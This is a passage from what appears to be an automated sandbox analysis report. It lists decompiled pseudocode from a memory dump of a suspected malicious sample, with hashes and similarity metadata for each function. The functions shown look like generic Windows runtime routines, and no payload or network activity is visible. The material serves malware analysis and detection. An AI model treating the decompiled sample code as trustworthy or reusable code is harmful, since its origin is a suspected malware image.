								__eflags = _t99 -  *0x11e86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01112280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E011C88F5(0x11e85ec, _t85, 0x11e5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0113AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x11eb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x11e84c0;
																			if(_t82 >=  *0x11e84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E011C9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E010F922A(_t99);
										_t64 = E01117D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E011C8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x11e86c0; // 0xca07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x11e86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x11e86bc;
													_t87 = 0x11e86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E010F9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x11e86c4;
												_t87 = 0x11e86c0;
												L27:
												E01129B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0114D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x11e5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x11e538c = _t51;
						goto L6;
					}
				}
			}




















                                          0x010f9082
                                          0x010f9083
                                          0x010f9084
                                          0x010f9085
                                          0x010f9087
                                          0x010f9096
                                          0x010f9098
                                          0x010f9098
                                          0x010f909e
                                          0x010f90a8
                                          0x010f90e7
                                          0x010f90e7
                                          0x010f90aa
                                          0x010f90b0
                                          0x010f90b7
                                          0x010f90bd
                                          0x010f90dd
                                          0x010f90e6
                                          0x010f90bf
                                          0x010f90bf
                                          0x010f90c7
                                          0x010f90cf
                                          0x010f90f1
                                          0x010f90f2
                                          0x010f90f4
                                          0x010f90f5
                                          0x010f90f6
                                          0x010f90f7
                                          0x010f90f8
                                          0x010f90f9
                                          0x010f90fa
                                          0x010f90fb
                                          0x010f90fc
                                          0x010f90fd
                                          0x010f90fe
                                          0x010f90ff
                                          0x010f9100
                                          0x010f9102
                                          0x010f9107
                                          0x010f910c
                                          0x010f9110
                                          0x010f9113
                                          0x010f9115
                                          0x010f9136
                                          0x010f913f
                                          0x010f9143
                                          0x011537e4
                                          0x011537e4
                                          0x010f9117
                                          0x010f9117
                                          0x010f911d
                                          0x00000000
                                          0x010f911f
                                          0x010f911f
                                          0x010f9125
                                          0x00000000
                                          0x010f9127
                                          0x010f912d
                                          0x010f9130
                                          0x010f9134
                                          0x010f9158
                                          0x010f915d
                                          0x010f9161
                                          0x010f9168
                                          0x01153715
                                          0x010f916e
                                          0x010f916e
                                          0x010f9175
                                          0x010f9177
                                          0x010f917e
                                          0x010f917f
                                          0x010f9182
                                          0x010f9182
                                          0x010f9187
                                          0x010f9187
                                          0x010f918a
                                          0x010f918d
                                          0x010f918f
                                          0x010f9192
                                          0x010f9195
                                          0x010f9198
                                          0x010f9198
                                          0x010f9198
                                          0x010f919a
                                          0x00000000
                                          0x00000000
                                          0x0115371f
                                          0x01153721
                                          0x01153727
                                          0x0115372f
                                          0x01153733
                                          0x01153735
                                          0x01153738
                                          0x0115373b
                                          0x0115373d
                                          0x01153740
                                          0x00000000
                                          0x01153746
                                          0x01153746
                                          0x01153749
                                          0x00000000
                                          0x0115374f
                                          0x0115374f
                                          0x01153751
                                          0x01153757
                                          0x01153759
                                          0x0115375c
                                          0x0115375c
                                          0x0115375e
                                          0x0115375e
                                          0x01153761
                                          0x01153764
                                          0x00000000
                                          0x00000000
                                          0x01153766
                                          0x01153768
                                          0x011537a3
                                          0x011537a3
                                          0x011537a5
                                          0x011537a7
                                          0x011537ad
                                          0x011537b0
                                          0x011537b2
                                          0x011537bc
                                          0x011537c2
                                          0x011537c2
                                          0x011537b2
                                          0x010f9187
                                          0x010f9187
                                          0x010f918a
                                          0x010f918d
                                          0x010f918f
                                          0x010f9192
                                          0x010f9195
                                          0x00000000
                                          0x010f9195
                                          0x00000000
                                          0x0115376a
                                          0x0115376a
                                          0x0115376a
                                          0x0115376c
                                          0x0115376c
                                          0x0115376f
                                          0x01153775
                                          0x00000000
                                          0x00000000
                                          0x01153777
                                          0x01153779
                                          0x01153782
                                          0x01153787
                                          0x01153789
                                          0x01153790
                                          0x01153790
                                          0x0115378b
                                          0x0115378b
                                          0x0115378b
                                          0x01153792
                                          0x01153795
                                          0x00000000
                                          0x01153795
                                          0x00000000
                                          0x01153779
                                          0x01153798
                                          0x00000000
                                          0x01153798
                                          0x00000000
                                          0x01153768
                                          0x0115379b
                                          0x0115379b
                                          0x01153751
                                          0x01153749
                                          0x00000000
                                          0x01153740
                                          0x010f91a0
                                          0x010f91a3
                                          0x010f91a9
                                          0x010f91b0
                                          0x00000000
                                          0x010f91b0
                                          0x010f9187
                                          0x010f91b4
                                          0x010f91b4
                                          0x010f91bb
                                          0x010f91c0
                                          0x010f91c5
                                          0x010f91c7
                                          0x011537da
                                          0x010f91cd
                                          0x010f91cd
                                          0x010f91cd
                                          0x010f91d2
                                          0x010f91d5
                                          0x010f9239
                                          0x010f9239
                                          0x010f91d7
                                          0x010f91db
                                          0x010f91e1
                                          0x010f91e7
                                          0x010f91fd
                                          0x010f9203
                                          0x010f921e
                                          0x010f9223
                                          0x00000000
                                          0x010f9205
                                          0x010f9205
                                          0x010f9208
                                          0x010f920c
                                          0x010f9214
                                          0x010f9214
                                          0x010f920c
                                          0x010f91e9
                                          0x010f91e9
                                          0x010f91ee
                                          0x010f91f3
                                          0x010f91f3
                                          0x010f91f3
                                          0x010f91e7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010f9134
                                          0x010f9125
                                          0x010f911d
                                          0x010f914e
                                          0x010f90d1
                                          0x010f90d1
                                          0x010f90d3
                                          0x010f90d6
                                          0x010f90d8
                                          0x00000000
                                          0x010f90d8
                                          0x010f90cf

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1676ff00acc9ff24d7ec740f798ff6042fc1e2db884029ada0d56d2ea7e2a341
                                          • Instruction ID: 7da50b4dd3fa0d9b5297e7b7aa3b5cfddac8c4630feb2ca68e196a22b7f4963e
                                          • Opcode Fuzzy Hash: 1676ff00acc9ff24d7ec740f798ff6042fc1e2db884029ada0d56d2ea7e2a341
                                          • Instruction Fuzzy Hash: 0D01F4725056048FC36A9F48D841B16BBE9EF41328F21807AF2019FB92C774DC81CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0118C450 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E0118C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01139910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E011395B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E011395D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E011395D0();
				return L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                          0x0118c458
                                          0x0118c45d
                                          0x0118c466
                                          0x0118c468
                                          0x0118c469
                                          0x0118c46a
                                          0x0118c46b
                                          0x0118c46e
                                          0x0118c46f
                                          0x0118c471
                                          0x0118c476
                                          0x0118c476
                                          0x0118c47c
                                          0x0118c47e
                                          0x0118c480
                                          0x0118c480
                                          0x0118c483
                                          0x0118c484
                                          0x0118c486
                                          0x0118c488
                                          0x0118c48f
                                          0x0118c491
                                          0x0118c493
                                          0x0118c493
                                          0x0118c48f
                                          0x0118c498
                                          0x0118c49e
                                          0x0118c4ad
                                          0x0118c4ad
                                          0x0118c4b2
                                          0x0118c4b4
                                          0x0118c4cd

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction ID: ec769e181730ceacd9ab183ef9e1cd4a3661087cbce633a952b4b348cc646c4d
                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction Fuzzy Hash: 8501967214050ABFE719AF69CC80EA2FB6DFF94358F008525F214425A4C761ACE1CAF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C4015 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E011C4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01112280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01112280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x11e86ac);
					E010FF900(0x11e86d4, _t28);
					E0110FFB0(0x11e86ac, _t28, 0x11e86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0110FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                          0x011c401a
                                          0x011c401e
                                          0x011c4023
                                          0x011c4028
                                          0x011c4029
                                          0x011c402b
                                          0x011c402f
                                          0x011c4043
                                          0x011c4046
                                          0x011c4051
                                          0x011c4057
                                          0x011c405f
                                          0x011c4062
                                          0x011c4067
                                          0x011c406f
                                          0x011c407c
                                          0x011c407c
                                          0x011c408c
                                          0x011c408c
                                          0x011c4097

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 312b137d97bf5c4fac910a17992d6dca505e14f2a3f183d4057f4559390a2f78
                                          • Instruction ID: 20026a20ec1bf7bed0e8c46acbd7f980a3f2d0499b20a6d69196bf3daa027132
                                          • Opcode Fuzzy Hash: 312b137d97bf5c4fac910a17992d6dca505e14f2a3f183d4057f4559390a2f78
                                          • Instruction Fuzzy Hash: A701F2722419467FD22AAF79CE84E57F7ECFF69664B000229F50883A51CB74EC11CAE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B138A Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E011B138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x11ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0113FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01117D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0113B640(E01139AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                          0x011b138a
                                          0x011b138a
                                          0x011b1399
                                          0x011b13a3
                                          0x011b13a8
                                          0x011b13aa
                                          0x011b13b5
                                          0x011b13bb
                                          0x011b13c3
                                          0x011b13c6
                                          0x011b13c9
                                          0x011b13d4
                                          0x011b13e6
                                          0x011b13d6
                                          0x011b13df
                                          0x011b13df
                                          0x011b13f1
                                          0x011b13f2
                                          0x011b13f4
                                          0x011b13f9
                                          0x011b140e

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 205104c7e7a7450f456ec8bc678180d77c20690366aa44d0d718680d117a7910
                                          • Instruction ID: e73c6ad87448358825a6dfe5bedd403a47132ba5701f3eea1cf8b1bdb42c155f
                                          • Opcode Fuzzy Hash: 205104c7e7a7450f456ec8bc678180d77c20690366aa44d0d718680d117a7910
                                          • Instruction Fuzzy Hash: 5E019271E0520DAFCB18DFA8D881EAEBBB8EF84710F004066F904EB380E7749A41C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B14FB Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E011B14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x11ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0113FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01117D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0113B640(E01139AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                          0x011b14fb
                                          0x011b14fb
                                          0x011b150a
                                          0x011b1514
                                          0x011b1519
                                          0x011b151b
                                          0x011b1526
                                          0x011b152c
                                          0x011b1534
                                          0x011b1537
                                          0x011b153a
                                          0x011b1545
                                          0x011b1557
                                          0x011b1547
                                          0x011b1550
                                          0x011b1550
                                          0x011b1562
                                          0x011b1563
                                          0x011b1565
                                          0x011b156a
                                          0x011b157f

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88da05f687cb1eef605d3529ebbd15a021143cff98f7d201b5da92acf3a3fd12
                                          • Instruction ID: f02dbda5da9aebe1364652e6960098ee86df85b5ff32d5680a6784fb6b0bbe51
                                          • Opcode Fuzzy Hash: 88da05f687cb1eef605d3529ebbd15a021143cff98f7d201b5da92acf3a3fd12
                                          • Instruction Fuzzy Hash: B4018C71A00249ABCB18DFA8D841EAEBBB8EF85714F404066F914EB280DB74DA01CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F58EC Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E010F58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x11ed360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x10d5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E010F5943() != 0 &&  *0x11e5320 > 5) {
					E01177B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01177B5E( &_v28, _t28);
					_t11 = E01177B9C(0x11e5320, 0x10dbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0113B640(_t11, _t17, _v8 ^ _t29, 0x10dbf15, _t27, _t28);
			}















                                          0x010f58fb
                                          0x010f58fe
                                          0x010f5906
                                          0x010f590a
                                          0x010f593c
                                          0x010f593c
                                          0x010f590c
                                          0x010f590c
                                          0x010f5911
                                          0x00000000
                                          0x010f5913
                                          0x010f5913
                                          0x010f5913
                                          0x010f5911
                                          0x010f591d
                                          0x01151035
                                          0x0115103c
                                          0x0115103f
                                          0x01151056
                                          0x01151056
                                          0x010f593b

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20c48d7643456658afa9b1a422bfe96df1e4e67109d1ce434a75d7937946a1f
                                          • Instruction ID: a952406bb03e31d48adb8a850538a82f839f2aa078e09dca19691ec6d0a46aa8
                                          • Opcode Fuzzy Hash: b20c48d7643456658afa9b1a422bfe96df1e4e67109d1ce434a75d7937946a1f
                                          • Instruction Fuzzy Hash: D501D431A08605EBC71CDAA8DC059BE77F9EF41164F5400ADDA55AB684DF20DD01C650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0110B02A Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0110B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01117D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01177016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                          0x0110b037
                                          0x0110b039
                                          0x0110b03b
                                          0x0110b040
                                          0x0115a60e
                                          0x00000000
                                          0x00000000
                                          0x0115a61d
                                          0x0110b04b
                                          0x0110b04e
                                          0x0115a627
                                          0x0115a634
                                          0x00000000
                                          0x00000000
                                          0x0115a641
                                          0x0115a653
                                          0x0115a643
                                          0x0115a64c
                                          0x0115a64c
                                          0x0115a65b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0115a66c
                                          0x0110b057
                                          0x0110b057
                                          0x0110b057
                                          0x0110b046
                                          0x0110b046
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction ID: 89de9ad25bf26326d2c8c2ade1acac74e52ff03b9da37e8945de5f50a45db019
                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction Fuzzy Hash: 0501BC72644980DFE32BC71CD888F667BE8EF85744F0900A1EA29CBA95D768DC80C225
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C1074 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011C1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E011C165E(__ebx, 0x11e8ae4, (__edx -  *0x11e8b04 >> 0x14) + (__edx -  *0x11e8b04 >> 0x14), __edi, __ecx, (__edx -  *0x11e8b04 >> 0x14) + (__edx -  *0x11e8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E011BAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01117D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E011AFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                          0x011c1074
                                          0x011c1080
                                          0x011c1082
                                          0x011c108a
                                          0x011c108f
                                          0x011c1093
                                          0x011c10ab
                                          0x011c10ab
                                          0x011c10c3
                                          0x011c10cf
                                          0x011c10e1
                                          0x011c10d1
                                          0x011c10da
                                          0x011c10da
                                          0x011c10e9
                                          0x011c10f5
                                          0x011c10f5
                                          0x011c10fe

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d39b1d7fe8716b5456eda3b9a4ef9d3921f709d043fa5085ce9a8df30033f167
                                          • Instruction ID: 875c9251ddecc8d175db0afca4a41e206962e758a18db7112600259fdbc89f5d
                                          • Opcode Fuzzy Hash: d39b1d7fe8716b5456eda3b9a4ef9d3921f709d043fa5085ce9a8df30033f167
                                          • Instruction Fuzzy Hash: F8012472644742EBC718EF68C944B1ABBE5AFA4714F04862DF98583692EF30D851CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011AFE3F Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E011AFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x11ed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0113FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01117D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0113B640(E01139AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x011afe3f
                                          0x011afe3f
                                          0x011afe4e
                                          0x011afe58
                                          0x011afe5d
                                          0x011afe5f
                                          0x011afe6a
                                          0x011afe72
                                          0x011afe75
                                          0x011afe78
                                          0x011afe83
                                          0x011afe95
                                          0x011afe85
                                          0x011afe8e
                                          0x011afe8e
                                          0x011afea0
                                          0x011afea1
                                          0x011afea3
                                          0x011afea8
                                          0x011afebd

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a547b2435301c93ecc29cc9ff9710b1200ccb8b07d395e5c8cceb8694293164
